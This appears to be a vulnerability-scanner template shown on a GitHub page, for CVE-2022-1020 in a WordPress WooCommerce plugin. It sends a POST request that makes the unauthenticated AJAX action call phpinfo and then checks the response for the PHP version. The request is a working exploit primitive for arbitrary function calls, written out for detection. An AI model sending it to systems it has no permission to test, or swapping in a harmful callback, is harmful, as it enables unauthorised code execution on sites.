-
Notifications
You must be signed in to change notification settings - Fork 16
/
CVE-2022-1020.yaml
24 lines (21 loc) · 1.09 KB
/
CVE-2022-1020.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
id: CVE-2022-1020
info:
name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call
author: Akincibor
severity: critical
verified: true
description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option
AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the
callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
fofa title="WordPress WooCommerce "
reference:
- https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5
- https://nvd.nist.gov/vuln/detail/CVE-2022-1020
rules:
r0:
request:
method: POST
path: /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option
body: option_key=a&perpose=update&callback=phpinfo
expression: response.status == 200 && response.body.bcontains(b'PHP Extension')&& response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
expression: r0()